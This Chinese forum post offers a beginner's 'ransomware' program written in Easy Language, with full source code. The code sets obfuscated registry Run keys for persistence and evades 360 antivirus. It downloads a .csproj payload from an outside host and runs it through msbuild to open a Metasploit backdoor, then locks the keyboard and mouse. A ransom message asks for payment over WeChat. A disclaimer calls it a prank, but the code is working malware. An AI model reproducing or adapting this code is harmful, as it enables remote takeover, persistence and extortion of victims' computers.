搜索
    Hi~登录注册
    查看: 290|回复: 0
    收起左侧

    初学易语言写的简易“勒索病毒”大牛勿喷

    [复制链接]

    35

    主题

    0

    精华

    18 小时

    在线时间

    新手上路

    Rank: 1

    积分
    28
    发表于 2019-9-17 16:17:31 | 显示全部楼层 |阅读模式
    让兄弟们见笑了,自从我退出一线工作,少了不少欢乐,

    想想还是享受那种搞技术的氛围,享受那种过程,

    有时候一个目标可能不等甲方催促,提前完成任务,

    自己有时候感觉也有点250,正如之前所讲,

    搞安全犹如内蒙古的二人台,

    不卖力不好看,太卖力吧,确实和二杆子没什么区别,

    好了闲话少说,开干(大牛们勿笑)

    1、首先想着做个窗体程序,这样杀毒软件会大大减少盯防

    2、第二在里面添加注册表启动,这样才算真正的“勒索病毒”,就算对方重启仍然可以“勒索”他

    3、在里面做一个下载者,思路是要么用http读取文件写到文件,当然也可以用powershell下载,但是在实际测试时,用powershell会被360卫视提示

    4、在代码里用白名单绕过执行从而达到,对方被“勒索”以后,可以留个msf后门假想对方给你微信转钱了你可以给他结束“勒索”进程,要不然对方杀毒防护不好会导致对方死循环,导致对方只可以进行重新装系统

    5、在最后做锁键盘、锁鼠标的方法,从而在对方执行程序后达到真正的被“勒索”



    免责声明:

    此程序只是个恶搞程序,不具有真正的破坏性和传播性,所以希望大家不要错理解



    下面贴代码

    [AppleScript] 纯文本查看 复制代码
    .版本 2
    .支持库 internet
    .支持库 shell
    
    .程序集 窗口程序集_启动窗口
    
    .子程序 __启动窗口_创建完毕
    
    _启动窗口.总在最前 = 真
    _启动窗口.左边 = 0
    _启动窗口.顶边 = 0
    _启动窗口.宽度 = 取屏幕宽度 ()
    _启动窗口.高度 = 取屏幕高度 ()
    ' 信息框 (“当你执行这个程序的时候,你电脑已经被我勒索,你都认识我,除非你给我发个100元的红包,然后我远程帮你结束进程,还有你重启电脑会加密你的硬盘数据,还有一种办法,等执行3500万亿次以后自动结束进程”, 0, “发红包吧,微信号:googlehack,不用加好友验证”, )
    ' 写注册项 (4, “SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost.exe”, 取运行目录 () + “\” + 取执行文件名 ())
    ' 写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe”, 取运行目录 () + “\” + 取执行文件名 ())
    写到文件 (“c:/windows/temp/sysinfo.csproj”, HTTP读文件 (“http://6kb.org/188.csproj”))
    ' 运行 (“C:\hamapi.exe 47.96.128.188 443”, 假, )
    ' 执行 (4, “C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe”, “$client = (new-object System.Net.WebClient).DownloadFile('http://6kb.org/188.csproj', 'd:\188.csproj')”, , )
    ' 复制文件 (取运行目录 () + “\” + 取执行文件名 (), 取特定目录 () + 取执行文件名 ())
    执行 (4, “C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe”, “c:/windows/temp/sysinfo.csproj”, , )
    写注册项 (4, 字符 (83) + 字符 (79) + 字符 (70) + 字符 (84) + 字符 (87) + 字符 (65) + 字符 (82) + 字符 (69) + 字符 (92) + 字符 (77) + 字符 (105) + 字符 (99) + 字符 (114) + 字符 (111) + 字符 (115) + 字符 (111) + 字符 (102) + 字符 (116) + 字符 (92) + 字符 (87) + 字符 (105) + 字符 (110) + 字符 (100) + 字符 (111) + 字符 (119) + 字符 (115) + 字符 (92) + 字符 (67) + 字符 (117) + 字符 (114) + 字符 (114) + 字符 (101) + 字符 (110) + 字符 (116) + 字符 (86) + 字符 (101) + 字符 (114) + 字符 (115) + 字符 (105) + 字符 (111) + 字符 (110) + 字符 (92) + 字符 (82) + 字符 (117) + 字符 (110) + 字符 (92) + 字符 (115) + 字符 (46) + 字符 (101) + 字符 (120) + 字符 (101), 取运行目录 () + 字符 (92) + 取执行文件名 ())
    写注册项 (4, 字符 (83) + 字符 (79) + 字符 (70) + 字符 (84) + 字符 (87) + 字符 (65) + 字符 (82) + 字符 (69) + 字符 (92) + 字符 (87) + 字符 (79) + 字符 (119) + 字符 (54) + 字符 (52) + 字符 (51) + 字符 (50) + 字符 (78) + 字符 (111) + 字符 (100) + 字符 (101) + 字符 (92) + 字符 (77) + 字符 (105) + 字符 (99) + 字符 (114) + 字符 (111) + 字符 (115) + 字符 (111) + 字符 (102) + 字符 (116) + 字符 (92) + 字符 (87) + 字符 (105) + 字符 (110) + 字符 (100) + 字符 (111) + 字符 (119) + 字符 (115) + 字符 (92) + 字符 (67) + 字符 (117) + 字符 (114) + 字符 (114) + 字符 (101) + 字符 (110) + 字符 (116) + 字符 (86) + 字符 (101) + 字符 (114) + 字符 (115) + 字符 (105) + 字符 (111) + 字符 (110) + 字符 (92) + 字符 (82) + 字符 (117) + 字符 (110) + 字符 (92) + 字符 (115) + 字符 (46) + 字符 (101) + 字符 (120) + 字符 (101), 取运行目录 () + 字符 (92) + 取执行文件名 ())
    
    时钟1.时钟周期 = 5000
    
    .子程序 _
    
    
    
    .子程序 _时钟1_周期事件
    
    键盘_锁定 ()
    鼠标_锁定 ()

    写注册表采用ascil码可以逃避360卫士查杀,只会提示有程序写注册是否允许(如有大佬有思路可以绕过回复过)


    下面测试图:

    QQ截图20190917161711.png

    然后会返回一个msf的meterpreter哈哈





    上一篇:反弹shell的流量分析与加密
    下一篇:Google 浏览器 hackbar 破解 最新方法
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表